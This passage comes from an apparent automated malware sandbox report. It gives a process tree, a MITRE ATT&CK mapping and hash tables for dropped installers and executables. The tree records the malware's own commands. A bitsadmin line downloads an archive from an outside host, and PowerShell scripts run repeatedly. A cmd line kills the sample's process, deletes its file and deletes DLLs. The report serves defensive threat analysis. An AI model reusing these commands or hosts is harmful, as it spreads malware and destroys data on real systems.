                                                                      • Drops file in Program Files directory
                                                                      PID:1296
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:2788
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:2296
                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                          7⤵
                                                                          • Download via BitsAdmin
                                                                          PID:2368
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:2912
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:2344
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                          7⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:2940
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:1208
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:3040
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                              7⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:1748
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:2944
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                7⤵
                                                                                  PID:1148
                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                    8⤵
                                                                                      PID:2844
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:2628
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                      • Drops file in Program Files directory
                                                                                      PID:1392
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:1356
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:2928
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:1356
                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:644
                                                                            • C:\Windows\system32\conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe "-679563512-18591114751630366317-1370626412-977601831-12353915152379340622063276779"
                                                                              1⤵
                                                                                PID:2784
                                                                              • C:\Users\Admin\AppData\Local\Temp\AF33.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\AF33.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:2828
                                                                              • C:\Users\Admin\AppData\Local\Temp\B9EE.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\B9EE.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3068
                                                                              • C:\Users\Admin\AppData\Local\Temp\D2DB.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\D2DB.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:2672
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                  2⤵
                                                                                    PID:792
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      timeout 1
                                                                                      3⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:1492
                                                                                  • C:\Users\Admin\AppData\Local\Temp\D2DB.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\D2DB.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks processor information in registry
                                                                                    • Modifies system certificate store
                                                                                    PID:1656
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im D2DB.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D2DB.exe" & del C:\ProgramData\*.dll & exit
                                                                                      3⤵
                                                                                        PID:1948
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /im D2DB.exe /f
                                                                                          4⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:1604
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /t 6
                                                                                          4⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:792
                                                                                  • C:\Windows\system32\conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe "-18911814601758058591844551517-33194786412822518721010781666-2063095588152990668"
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:2184
                                                                                  • C:\Users\Admin\AppData\Local\Temp\D9BF.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\D9BF.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:2328
                                                                                    • C:\Users\Admin\AppData\Local\Temp\D9BF.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\D9BF.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2740
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DDC6.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\DDC6.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in System32 directory
                                                                                    PID:2844
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:1144
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe
                                                                                      1⤵
                                                                                        PID:2972
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:1756
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe
                                                                                        1⤵
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:2648
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:2776
                                                                                      • C:\Windows\system32\conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe "1463021738-911786063767776640-212268219-20496546061161779646-15208977961064179901"
                                                                                        1⤵
                                                                                          PID:1716
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Checks for any installed AV software in registry
                                                                                          • Drops file in Program Files directory
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2296
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2380
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:1248
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:1416

                                                                                          Network

                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                          Execution

                                                                                          Scheduled Task

                                                                                          1
                                                                                          T1053

                                                                                          Persistence

                                                                                          Registry Run Keys / Startup Folder

                                                                                          1
                                                                                          T1060

                                                                                          Scheduled Task

                                                                                          1
                                                                                          T1053

                                                                                          BITS Jobs

                                                                                          1
                                                                                          T1197

                                                                                          Privilege Escalation

                                                                                          Scheduled Task

                                                                                          1
                                                                                          T1053

                                                                                          Defense Evasion

                                                                                          Disabling Security Tools

                                                                                          2
                                                                                          T1089

                                                                                          Modify Registry

                                                                                          5
                                                                                          T1112

                                                                                          BITS Jobs

                                                                                          1
                                                                                          T1197

                                                                                          Install Root Certificate

                                                                                          1
                                                                                          T1130

                                                                                          Credential Access

                                                                                          Credentials in Files

                                                                                          5
                                                                                          T1081

                                                                                          Discovery

                                                                                          Software Discovery

                                                                                          1
                                                                                          T1518

                                                                                          Security Software Discovery

                                                                                          1
                                                                                          T1063

                                                                                          Query Registry

                                                                                          4
                                                                                          T1012

                                                                                          Peripheral Device Discovery

                                                                                          2
                                                                                          T1120

                                                                                          System Information Discovery

                                                                                          4
                                                                                          T1082

                                                                                          Remote System Discovery

                                                                                          1
                                                                                          T1018

                                                                                          Collection

                                                                                          Data from Local System

                                                                                          5
                                                                                          T1005

                                                                                          Command and Control

                                                                                          Web Service

                                                                                          1
                                                                                          T1102

                                                                                          Replay Monitor

                                                                                          Loading Replay Monitor...

                                                                                          Downloads

                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                            MD5

                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                            SHA1

                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                            SHA256

                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                            SHA512

                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                            MD5

                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                            SHA1

                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                            SHA256

                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                            SHA512

                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                          • C:\Program Files\Windows Mail\SIZYMIJLWZ\ultramediaburner.exe
                                                                                            MD5

                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                            SHA1

                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                            SHA256

                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                            SHA512

                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                          • C:\Program Files\Windows Mail\SIZYMIJLWZ\ultramediaburner.exe
                                                                                            MD5

                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                            SHA1

                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                            SHA256

                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                            SHA512

                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                                                            MD5

                                                                                            15775d95513782f99cdfb17e65dfceb1

                                                                                            SHA1

                                                                                            6c11f8bee799b093f9ff4841e31041b081b23388

                                                                                            SHA256

                                                                                            477a9559194edf48848fce59e05105168745a46bdc0871ea742a2588ca9fbe00

                                                                                            SHA512

                                                                                            ac09ce01122d7a837bd70277badd58ff71d8c5335f8fc599d5e3ed42c8fee2108dd043bce562c82ba12a81b9b08bd24b961c0961bf8fd3a0b8341c87483cd1e7

                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                            MD5

                                                                                            d5f69946a7c337e9d1fee3593c9b5ec2

                                                                                            SHA1

                                                                                            c4ed72da42e147de77f30da97245a7e5e4d14a2a

                                                                                            SHA256

                                                                                            ca1398e3100c34844ae98bf940831f9b70f622e988859f779f3ffb07f1b904af

                                                                                            SHA512

                                                                                            7db4623c181c30b6d2aad3b5b3a57e78251e71005fb7da2c5b7bce523e12bed5ffbd85b46d58c2717a4fe4607e659180fcafd3d25e5c9a5d77ea145dfc1e3d2a

                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                            MD5

                                                                                            ab2de013d2f4e86ffaad91a198ddf71f

                                                                                            SHA1

                                                                                            0cac7275b369c0f21422ea31e7c65cec542c8dda

                                                                                            SHA256

                                                                                            4582239ea1006526d2a00bb56c9a1acb6c24d031b0234b4af5beb12dc0301062

                                                                                            SHA512

                                                                                            1326f479fb9be5bff5cdf0e401717f1cd1ae1eae65a2385ea380f1f71c66a1a1fa8a0af01eeea39db79c514bf1312ccb0c9d1865342ad0ffe60c14edb0b929c1

                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                            MD5

                                                                                            fad66965fb3e980944a2478ead6c2fab

                                                                                            SHA1

                                                                                            6576120523328f65b8c14cbd08784130f8f74a16

                                                                                            SHA256

                                                                                            367fd8a05b9b2c29e63a100df3062c47ee9c0d416f5a81b4951c2ed73fe39120

                                                                                            SHA512

                                                                                            32158bd2b8730d1b9a93aa1af3424484dce1869e7068dc75bb35b6d5c12ac7661dc4f8d1ea1a46c0c64b71f6fcc1c71275f4b6c70bf39f3f1faa443005066cb1

                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                            MD5

                                                                                            2d59d2e4b976cd8243882d33c156911c

                                                                                            SHA1

                                                                                            f3ffce6d4b0d1b1d7c1816f90d9365ab5410aa4b

                                                                                            SHA256

                                                                                            7a25120923325660d57e2b2725fc7850ecfcefa7f3aa2991d2b1be645cccb98c

                                                                                            SHA512

                                                                                            2e8bbc0ef5d4e62d31d488978dce5d436189afcdf321a4d1da0a7f9457056616fb7d6f1d35698e6b1273a8ccb9b9e16a6b2e87e113f611e6c5b661f6eb488340

                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                            MD5

                                                                                            41ad82eddfc1f53cea9a6a25b4ad3ead

                                                                                            SHA1

                                                                                            c15c1700ad71e33f326322dac2532e4d47514add

                                                                                            SHA256

                                                                                            1a13e8caab26b74a42874363edbf40ac8140f2fd3f04dc219cf6b436f3aa45dc

                                                                                            SHA512

                                                                                            a30b96fac988cc08c35b3bd253b3a05ceed09c4b546d956e19d4b697daf74fbaecd28bca402e4c85ad245b5be82fb3f801d93d5e17874015e1eacedeebc891f7

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L1Y3K90W\WFDUEK1K.htm
                                                                                            MD5

                                                                                            78bae5693fc1a0927a7eae76dd23bcc3

                                                                                            SHA1

                                                                                            2d1d7209711c2b675f7de566a39dd7035157dec4

                                                                                            SHA256

                                                                                            f6c824065149f6183e209cad191a117b93191c3d3e8ded3e4c36398a743dc312

                                                                                            SHA512

                                                                                            5c5257a212f4d39642490f56a3d55ab3a6adf8872af545d6f9fccee5ab8d30c9fed4992248263be625d5bc6cd43356f076b236c0dc09585106c5bcaac3e51120

                                                                                          • C:\Users\Admin\AppData\Local\Temp\02-4d779-bd3-26eb3-678bc3ab16014\Kenessey.txt
                                                                                            MD5

                                                                                            97384261b8bbf966df16e5ad509922db

                                                                                            SHA1

                                                                                            2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                            SHA256

                                                                                            9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                            SHA512

                                                                                            b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                          • C:\Users\Admin\AppData\Local\Temp\02-4d779-bd3-26eb3-678bc3ab16014\Tigehysyga.exe
                                                                                            MD5

                                                                                            1f19330a59c0369f5d0b77b02f275568

                                                                                            SHA1

                                                                                            0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                            SHA256

                                                                                            f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                            SHA512

                                                                                            3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                          • C:\Users\Admin\AppData\Local\Temp\02-4d779-bd3-26eb3-678bc3ab16014\Tigehysyga.exe
                                                                                            MD5

                                                                                            1f19330a59c0369f5d0b77b02f275568

                                                                                            SHA1

                                                                                            0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                            SHA256

                                                                                            f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                            SHA512

                                                                                            3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                          • C:\Users\Admin\AppData\Local\Temp\02-4d779-bd3-26eb3-678bc3ab16014\Tigehysyga.exe.config
                                                                                            MD5

                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                            SHA1

                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                            SHA256

                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                            SHA512

                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                          • C:\Users\Admin\AppData\Local\Temp\94-7faf9-7bf-099bc-ed390cc969fed\Gidytylilae.exe
                                                                                            MD5

                                                                                            c0cf9a2aa73be476329a8ffd03c17b19

                                                                                            SHA1

                                                                                            c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                            SHA256

                                                                                            f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                            SHA512

                                                                                            32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                          • C:\Users\Admin\AppData\Local\Temp\94-7faf9-7bf-099bc-ed390cc969fed\Gidytylilae.exe
                                                                                            MD5

                                                                                            c0cf9a2aa73be476329a8ffd03c17b19

                                                                                            SHA1

                                                                                            c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                            SHA256

                                                                                            f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                            SHA512

                                                                                            32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                          • C:\Users\Admin\AppData\Local\Temp\94-7faf9-7bf-099bc-ed390cc969fed\Gidytylilae.exe.config
                                                                                            MD5

                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                            SHA1

                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                            SHA256

                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                            SHA512

                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                          • C:\Users\Admin\AppData\Local\Temp\MSI924E.tmp
                                                                                            MD5

                                                                                            d07ddd437009ebb9c21882579bf2df0d

                                                                                            SHA1

                                                                                            a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                            SHA256

                                                                                            c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                            SHA512

                                                                                            8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                          • C:\Users\Admin\AppData\Local\Temp\MSI973F.tmp
                                                                                            MD5

                                                                                            5a25fb13ed470b77eefd2eb89cb62c47

                                                                                            SHA1

                                                                                            3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                            SHA256

                                                                                            0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                            SHA512

                                                                                            2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                          • C:\Users\Admin\AppData\Local\Temp\astyb0fn.ywv\installer.exe
                                                                                            MD5

                                                                                            cd5e5ff81c7acf017878b065357f3568

                                                                                            SHA1

                                                                                            096900f55df446b72f9237f80aaf090001afa2a2

                                                                                            SHA256

                                                                                            7eadd0ce64f3bfad81459a33a6f12521126b67a69dc19160e2ada42d50b4a3c3

                                                                                            SHA512

                                                                                            1cf3d72f09827b5ea5f0ab4560032a09007845f615b18ea5a1d0eac697b100e88967db2b42ce6c36a957246ba8d011b0881c45bff37eed42b9803db687d9f1c3

                                                                                          • C:\Users\Admin\AppData\Local\Temp\astyb0fn.ywv\installer.exe
                                                                                            MD5

                                                                                            cd5e5ff81c7acf017878b065357f3568

                                                                                            SHA1

                                                                                            096900f55df446b72f9237f80aaf090001afa2a2

                                                                                            SHA256

                                                                                            7eadd0ce64f3bfad81459a33a6f12521126b67a69dc19160e2ada42d50b4a3c3

                                                                                            SHA512

                                                                                            1cf3d72f09827b5ea5f0ab4560032a09007845f615b18ea5a1d0eac697b100e88967db2b42ce6c36a957246ba8d011b0881c45bff37eed42b9803db687d9f1c3

                                                                                          • C:\Users\Admin\AppData\Local\Temp\d4wy5pji.v4m\KiffMainE1.exe
                                                                                            MD5

                                                                                            9ffeb510285c1c7450b00cad5cf7e28b

                                                                                            SHA1

                                                                                            9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                            SHA256

                                                                                            bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                            SHA512

                                                                                            0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                          • C:\Users\Admin\AppData\Local\Temp\d4wy5pji.v4m\KiffMainE1.exe
                                                                                            MD5

                                                                                            9ffeb510285c1c7450b00cad5cf7e28b

                                                                                            SHA1

                                                                                            9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                            SHA256

                                                                                            bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                            SHA512

                                                                                            0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.dat
                                                                                            MD5

                                                                                            93215e8067af15859be22e997779862b

                                                                                            SHA1

                                                                                            7ac96daef975a1ec678ed6e3c199c6fa1419c8c1

                                                                                            SHA256

                                                                                            a456dab6d051d3670cdd85708e6d4ffb22123e9348ecdc818f2570ff04940fd0

                                                                                            SHA512

                                                                                            b8e45b3b786ddef156121909143db009b5b37663e8c225d3ccc88d04a712cc341b6ed122c9af5132d8c36fab7556464d25c780de5bcfd55819a2c96ebd765efb

                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.dll
                                                                                            MD5

                                                                                            b29f18a79fee5bd89a7ddf3b4be8aa23

                                                                                            SHA1

                                                                                            0396814e95dd6410e16f8dd0131ec492718b88da

                                                                                            SHA256

                                                                                            9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e

                                                                                            SHA512

                                                                                            f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd

                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-AJV9B.tmp\ultramediaburner.tmp
                                                                                            MD5

                                                                                            4e8c7308803ce36c8c2c6759a504c908

                                                                                            SHA1

                                                                                            a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                            SHA256

                                                                                            90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                            SHA512

                                                                                            780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-AJV9B.tmp\ultramediaburner.tmp
                                                                                            MD5

                                                                                            4e8c7308803ce36c8c2c6759a504c908

                                                                                            SHA1

                                                                                            a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                            SHA256

                                                                                            90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                            SHA512

                                                                                            780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-RKJR5.tmp\Ultra.exe
                                                                                            MD5

                                                                                            cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                            SHA1

                                                                                            ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                            SHA256

                                                                                            0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                            SHA512

                                                                                            49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-RKJR5.tmp\Ultra.exe
                                                                                            MD5

                                                                                            cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                            SHA1

                                                                                            ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                            SHA256

                                                                                            0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                            SHA512

